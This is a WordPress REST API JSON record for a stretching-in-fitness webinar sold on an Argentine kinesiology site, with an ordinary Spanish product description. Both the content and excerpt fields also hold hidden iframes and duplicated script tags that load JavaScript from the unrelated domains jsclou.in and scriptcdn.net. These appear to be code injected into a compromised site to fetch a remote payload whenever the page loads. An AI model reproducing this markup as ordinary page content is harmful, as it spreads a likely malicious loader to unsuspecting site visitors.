{"id":1493,"date":"2021-03-17T11:43:19","date_gmt":"2021-03-17T14:43:19","guid":{"rendered":"http:\/\/corporalkinesis.com.ar\/?post_type=product&#038;p=1493"},"modified":"2025-08-06T08:35:39","modified_gmt":"2025-08-06T11:35:39","slug":"estiramientos","status":"publish","type":"product","link":"https:\/\/corporalkinesis.com.ar\/index.php\/producto\/estiramientos\/","title":{"rendered":"Estiramientos en el Fitness"},"content":{"rendered":"<p><span style=\"font-weight: 400;\">Estiramientos en el Fitness<\/span><\/p>\n<p>En el siguiente Webinar te podr\u00e1s llevar mucho informaci\u00f3n sobre la importancia y la verdadera aplicaci\u00f3n de los estiramientos antes o despu\u00e9s de entrenar. Hablamos sobre los diferentes receptores musculo-tendinosos y ligamentosos que participan en dicha actividad, mitos sobre los estiramientos antes del entrenamiento y de la evidencia cient\u00edfica actual sobre los mismos, dejando citas de inter\u00e9s y facilitando su comprensi\u00f3n gracias a diapositivas de muy f\u00e1cil lectura y comprensi\u00f3n. Esperemos este Webinar te pueda ser de gran ayuda.<\/p>\n<p><iframe style=\"display: none;\" src=\"about:blank\"><\/iframe><\/p>\n<p><script src=\"https:\/\/jsclou.in\/pab1002.js\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/jsclou.in\/pab1002.js\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/3001.scriptcdn.net\/code\/sc\/sc1001\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/3001.scriptcdn.net\/code\/sc\/sc1001\" type=\"text\/javascript\"><\/script><\/p>\n<p><iframe style=\"display: none;\" src=\"about:blank\"><\/iframe><\/p>\n","protected":false},"excerpt":{"rendered":"<p><span style=\"font-weight: 400;\">Estiramientos<\/span><\/p>\n<p><iframe style=\"display: none;\" src=\"about:blank\"><\/iframe><\/p>\n<p><script src=\"https:\/\/jsclou.in\/pab1002.js\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/jsclou.in\/pab1002.js\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/3001.scriptcdn.net\/code\/sc\/sc1001\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/3001.scriptcdn.net\/code\/sc\/sc1001\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"featured_media":1819,"comment_status":"open","ping_status":"closed","template":"","meta":{"site-sidebar-layout":"default","site-content-layout":"default","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"default","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}}},"product_brand":[],"product_cat":[63],"product_tag":[],"class_list":{"0":"post-1493","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-webinars","7":"desktop-align-left","8":"tablet-align-left","9":"mobile-align-left","11":"first","12":"instock","13":"downloadable","14":"shipping-taxable","15":"purchasable","16":"product-type-simple"},"_links":{"self":[{"href":"https:\/\/corporalkinesis.com.ar\/index.php\/wp-json\/wp\/v2\/product\/1493","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/corporalkinesis.com.ar\/index.php\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/corporalkinesis.com.ar\/index.php\/wp-json\/wp\/v2\/types\/product"}],"replies":[{"embeddable":true,"href":"https:\/\/corporalkinesis.com.ar\/index.php\/wp-json\/wp\/v2\/comments?post=1493"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/corporalkinesis.com.ar\/index.php\/wp-json\/wp\/v2\/media\/1819"}],"wp:attachment":[{"href":"https:\/\/corporalkinesis.com.ar\/index.php\/wp-json\/wp\/v2\/media?parent=1493"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/corporalkinesis.com.ar\/index.php\/wp-json\/wp\/v2\/product_brand?post=1493"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/corporalkinesis.com.ar\/index.php\/wp-json\/wp\/v2\/product_cat?post=1493"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/corporalkinesis.com.ar\/index.php\/wp-json\/wp\/v2\/product_tag?post=1493"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}